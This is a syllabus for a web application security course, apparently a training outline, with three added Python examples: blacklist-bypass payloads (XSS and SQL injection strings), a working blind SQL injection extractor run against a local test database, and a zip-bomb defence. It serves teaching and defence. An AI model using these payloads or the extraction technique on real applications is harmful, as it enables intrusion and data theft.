Topics
Day 1
Information Gathering
Application discovery
Site mapping & web crawling
Server & application fingerprinting
Identifying the entry points
File extensions handling
Page enumeration and brute forcing
Looking for leftovers
Google hacking
Analysis of error codes and error pages
Injections & Validations
Encoding attacks
Command injection
Code injection
LDAP injection
Log/CRLF injection
Header injection
SMTP injection
XML injection
XPath injection
Input validation techniques
Blacklist vs. whitelist input validation and filter bypassing
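The last item above is the one that benefits most from seeing the two approaches side by side. The following Python script is an added illustration, not course material: a naive blacklist filter of the kind commonly found in production, a whitelist for the same field, and a handful of constructed payloads that slip past the blacklist (encoding, an unlisted event handler, comment and tab tricks) while the whitelist rejects them all. The blacklist strings, the username grammar and the sample inputs are assumptions chosen for the demonstration.

```python
import re
from urllib.parse import unquote

# Naive blacklist: a few well-known attack fragments, compared case-insensitively.
# (Assumed filter, typical of ad-hoc "sanitisers" found in real applications.)
BLACKLIST = ("<script", "javascript:", "onerror=", "' or ", "--")

def blacklist_ok(value: str) -> bool:
    """Accept unless a blacklisted fragment appears (the usual 'filter' logic)."""
    v = value.lower()
    return not any(bad in v for bad in BLACKLIST)

# Whitelist: the only shape a username may have (assumed grammar). Everything
# else is rejected, so there is nothing to enumerate and nothing to forget.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")

def whitelist_ok(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None

# Constructed attacker inputs. Each avoids the blacklist's literal strings.
BYPASSES = {
    "url_encoded":   "%3Cscript%3Ealert(1)%3C/script%3E",  # decoded later by the app
    "other_handler": "<svg onload=alert(1)>",              # not 'onerror', no 'script'
    "sql_comments":  "'/**/OR/**/1=1#",                    # no "' or ", no "--"
    "sql_tab":       "'\tOR\t1=1#",                        # tab instead of space
}
LEGIT = ["alice_01", "bob.smith", "c-3po"]  # constructed benign usernames

def evaluate() -> dict:
    """Return {sample: (blacklist_ok, whitelist_ok)} for every constructed input."""
    results = {}
    for name, payload in BYPASSES.items():
        results[name] = (blacklist_ok(payload), whitelist_ok(payload))
    for user in LEGIT:
        results[user] = (blacklist_ok(user), whitelist_ok(user))
    return results

def blacklist_after_decoding(value: str) -> bool:
    """Canonicalise first, then filter. This catches the URL-encoded variant but
    still none of the others: the list is never complete."""
    return blacklist_ok(unquote(value))

if __name__ == "__main__":
    for name, (b, w) in evaluate().items():
        print(f"{name:14s} blacklist={'pass' if b else 'BLOCK':5s} "
              f"whitelist={'pass' if w else 'BLOCK'}")
```

Running it shows every bypass passing the blacklist and failing the whitelist, while the legitimate names pass both. Decoding before filtering (the canonicalisation step) recovers one case only; the structural lesson is that a positive grammar for the field is the check that does not erode as new payload syntax appears.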
Day 2
Authentication Vulnerabilities
What is authentication?
Supported authentication types – anonymous, basic, digest, forms, Kerberos, client certificate
Authentication scenarios
User enumeration
Guessing passwords – brute force & dictionary attacks
Direct page requests
Parameter modification
Password reset flaws
Password change flaws
Bypassing weak CAPTCHA mechanisms
Common implementation mistakes – authentication bypassing using SQL injection, LDAP injection, XPath injection
Authorization Vulnerabilities
What is authorization?
Authorization models – DAC, MAC, RBAC
Authorization bypassing
Canonicalization & path traversal
Parameter tampering
Forceful browsing
Rendering-based authorization
Client-side validation attacks
Hardening
Business Logic Vulnerabilities
Business flow bypass
Replay attack
Currency manipulation
Business logic attack vectors
Direct access to web services
Day 3
SQL Injection Vulnerabilities
Introduction to SQL command structure
NoSQL injection – MongoDB, ORM query layers
Database manipulation
Circumventing authentication
Retrieving data
Inserting data
Deleting data
Attacking availability
Local system access
Discovering vulnerable apps
Error-based
Blind (boolean-based)
Binary search extraction
Evasion
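The blind and binary-search items above are easiest to understand with a runnable oracle. The following Python script is an added illustration, not course material: an in-memory SQLite database standing in for the target application, a deliberately vulnerable lookup that leaks only "found / not found", a boolean oracle built on it, and a binary search that recovers a hidden column one character in about seven requests rather than up to 128. The hardened parameterised lookup is shown beside it. The schema, rows and payload shapes are assumptions chosen for the demonstration.

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "hunter2")])
    return conn

def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> bool:
    """Deliberately vulnerable: the name is concatenated into the SQL text. The
    application reveals only whether a row exists, which is all blind SQLi needs."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None

def safe_lookup(conn: sqlite3.Connection, username: str) -> bool:
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None

def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Ask the application a yes/no question by injecting CONDITION after a
    known-good username; the response is True only when CONDITION holds."""
    return vulnerable_lookup(conn, f"admin' AND ({condition}) AND '1'='1")

def extract_string(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the single-row result of SUBQUERY one character at a time.
    Each code point is found by binary search over 0..127: exactly 7 oracle
    queries per character, versus up to 128 with linear guessing."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered

if __name__ == "__main__":
    db = build_db()
    secret = extract_string(db, "SELECT password FROM users WHERE username = 'admin'")
    print("extracted:", secret)
    print("classic bypass against vulnerable lookup:", vulnerable_lookup(db, "admin' OR '1'='1"))
    print("same payload against parameterised lookup:", safe_lookup(db, "admin' OR '1'='1"))
```

`length`, `substr` and `unicode` are SQLite built-ins; against MySQL or PostgreSQL the oracle's condition strings change (`ASCII(SUBSTRING(...))`) but the search loop does not. Note that the parameterised version is not the only fix, but it is the one that survives every evasion technique in the list above, because the input is never parsed as SQL.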
File Handling Attacks
Path traversal
Canonicalization
Uploaded file backdoors
Insecure file extension handling
Directory listing
File size
File type
Malware upload
Day 4
Cross Site Scripting (XSS) Vulnerabilities
Overview of XSS
XSS Description
Reflected XSS
Stored / persistent XSS
DOM-based XSS
XSS whitelist vs. blacklist input validation
Discovery approaches – manual vs. automatic vs. semi-automatic
Different XSS scenarios
XSS input validation evasion
Browser Manipulation Techniques
CSRF (Cross Site Request Forgery)
Clickjacking
Open redirects
HTTP response splitting
Day 5
Cryptography Pitfalls
Symmetric cryptography
Asymmetric cryptography
Hashing
Digital signing
PKI / certificate
SSL/TLS protocol
SSL/TLS cipher suites
Insufficient transport layer protection
Application Denial of Service (DoS) Vulnerabilities
Application / OS crash
CPU starvation
Memory starvation
File system starvation
Resource starvation
Triggering high network bandwidth
User level DoS
Exploiting a specific vulnerability
Zip bomb
Overflows
ReDoS (regular expression denial of service)
Parsing errors
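Of the resource-starvation items above, the zip bomb is the one where a short server-side check makes the difference. The following Python script is an added illustration, not course material: it builds a highly compressible archive in memory, shows a cheap pre-filter on the central directory (declared compression ratio and declared total size), and then the check that actually matters, a streaming inflate that counts output bytes and aborts at a budget regardless of what the headers claimed. The 10 MiB budget, the 100:1 ratio limit and the fixture contents are assumptions chosen for the demonstration.

```python
import io
import zipfile

MAX_TOTAL_UNCOMPRESSED = 10 * 1024 * 1024  # inflate budget per upload (assumed policy)
MAX_RATIO = 100                             # uncompressed:compressed per member (assumed)

class ZipBombError(Exception):
    """Raised when an archive would exceed the inflate budget."""

def make_zip(members: dict) -> bytes:
    """Build an in-memory DEFLATE archive from {name: bytes} (constructed fixtures)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()

def check_headers(zf: zipfile.ZipFile, total_limit: int, max_ratio: int) -> None:
    """Cheap first pass over the central directory: refuse obvious bombs before
    spending CPU on inflation. Declared sizes are attacker-controlled, so this is
    only a pre-filter, never the sole defence."""
    total = 0
    for info in zf.infolist():
        ratio = info.file_size / max(info.compress_size, 1)
        if ratio > max_ratio:
            raise ZipBombError(f"{info.filename}: declared ratio {ratio:.0f}:1 exceeds {max_ratio}:1")
        total += info.file_size
        if total > total_limit:
            raise ZipBombError(f"declared total {total} bytes exceeds budget {total_limit}")

def read_member_limited(zf: zipfile.ZipFile, info: zipfile.ZipInfo, limit: int) -> bytes:
    """Stream-inflate while counting output; stop the moment LIMIT is crossed,
    whatever the header claimed the member's size was."""
    out = io.BytesIO()
    produced = 0
    with zf.open(info) as fh:
        while chunk := fh.read(64 * 1024):
            produced += len(chunk)
            if produced > limit:
                raise ZipBombError(f"{info.filename}: inflated past {limit} bytes")
            out.write(chunk)
    return out.getvalue()

def safe_extract(data: bytes, total_limit: int = MAX_TOTAL_UNCOMPRESSED,
                 max_ratio: int = MAX_RATIO) -> dict:
    """Return {name: bytes} or raise ZipBombError. Nested archives come back as
    bytes and are not recursed into; apply the same check to them before opening."""
    result, remaining = {}, total_limit
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        check_headers(zf, total_limit, max_ratio)
        for info in zf.infolist():
            content = read_member_limited(zf, info, remaining)
            remaining -= len(content)
            result[info.filename] = content
    return result

def demo() -> dict:
    """Exercise both layers against a benign archive and a constructed bomb."""
    benign = make_zip({"readme.txt": bytes(range(256)) * 4})           # ~4:1
    bomb = make_zip({"payload.bin": b"\0" * (20 * 1024 * 1024)})       # ~1000:1
    outcome = {"benign_members": sorted(safe_extract(benign))}
    try:
        safe_extract(bomb)
        outcome["bomb_rejected_at_header"] = False
    except ZipBombError:
        outcome["bomb_rejected_at_header"] = True
    # Second layer on its own: behave as if the headers had been trusted.
    with zipfile.ZipFile(io.BytesIO(bomb)) as zf:
        try:
            read_member_limited(zf, zf.infolist()[0], 1024 * 1024)
            outcome["bomb_rejected_while_inflating"] = False
        except ZipBombError:
            outcome["bomb_rejected_while_inflating"] = True
    return outcome

if __name__ == "__main__":
    print(demo())
```

The same two-layer shape applies to any decompressing parser (gzip bodies, image decoders, XML with entity expansion): a bound on declared sizes is a cheap early exit, and a counted, streaming decode is the bound that cannot be lied to.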
Attacking Client-Side Applications
HTML5 approach
Client side attacks
Analyze client side source code
Insecure storage
Flash decompilation
crossdomain.xml
CORS requests